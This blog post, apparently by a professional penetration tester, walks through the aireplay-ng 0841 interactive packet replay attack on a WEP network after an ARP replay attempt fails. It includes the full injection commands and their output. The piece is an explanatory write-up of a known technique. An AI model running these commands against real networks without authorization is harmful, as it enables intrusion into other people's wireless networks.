Aireplay 0841 Attack – aka Interactive Packet Replay

This week I wanted to cover the aireplay 0841 attack, or interactive packet replay. I know that this is yet another wireless post, but I've been on a few wireless engagements recently!

Aireplay 0841 Attack - Introduction

For those of you not familiar, interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.

If you would like some more information, then you can also read the following write-up.

Attempting ARP Replay

First, I sent a fake authentication request to the target access point.

root@kali:~# aireplay-ng -1 0 -e TargetAP -a FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
18:07:45  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11

18:07:45  Sending Authentication Request (Open System) [ACK]
18:07:45  Authentication successful
18:07:45  Sending Association Request [ACK]
18:07:45  Association successful 🙂 (AID: 1)

Next, I attempted an ARP Replay attack. Unfortunately, I received 0 ARP requests even after 205,000 packets.

root@kali:~# aireplay-ng --arpreplay -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
18:03:37  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-1031-180337.cap
You should also start airodump-ng to capture replies.
Read 205379 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Enter the Aireplay 0841 Attack

As an ARP Replay attack was not working, it was time to try the 0841 attack.

First, I needed to capture a packet with the "To Distribution System" flag set. Once I captured a packet, hitting the "y" key saved the packet and started to replay it on the network.

root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
Read 856 packets...

        Size: 118, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  FC:5B:xx:xx:xx:xx
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  4C:34:88:2C:23:6A

        0x0000:  0842 0000 ffff ffff ffff fc5b 3969 0062  .B.........[9i.b
        0x0010:  4c34 882c 236a 3058 713d 8a80 82c7 724b  L4.,#j0Xq=....rK
        0x0020:  df97 716b 5223 a570 e093 b405 faac bde5  ..qkR#.p........
        0x0030:  74bf 43d5 8047 377f c79c cbf4 b8e3 48e3  t.C..G7......H.
        0x0040:  07e7 18f5 6ce9 b454 d6a4 1f46 acf9 81fd  ....l..T...F....
        0x0050:  b5d3 299b 55e4 6a85 cb35 cc17 2cfe ea13  ..).U.j..5..,...
        0x0060:  32d8 0f9e 8990 cb3f 2b01 1ea1 b3d0 7f64  2......?+.....d
        0x0070:  51e6 e547 06ab                           Q..G..

Use this packet ? y

Saving chosen packet in replay_src-1031-180750.cap
You should also start airodump-ng to capture replies.

Sent 27144 packets...(499 pps)

As you can see, I was now receiving data packets (albeit a bit slowly) on the network!

 CH 11 ][ Elapsed: 12 mins ][ 2017-10-31 18:10                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AU
 FC:5B:xx:xx:xx:xx  -32   2     3412      116    0  11  54e. WEP  WEP40  OP
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe 
 FC:5B:xx:xx:xx:xx  00:C0:CA:8D:89:75    0    9 - 1   4858    74695


Unfortunately, I was unable to crack this specific key even after 50k IVs. That said, you can crack this key with aircrack the same way you would a normal WEP pcap file.

Aireplay 0841 Attack - Conclusion

While I wasn't able to crack this particular key, hopefully you were able to learn a new WEP attack.

Next week will be another non-wireless post finally, so be on the lookout!

doyler on Githubdoyler on Twitter
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *


This site uses Akismet to reduce spam. Learn how your comment data is processed.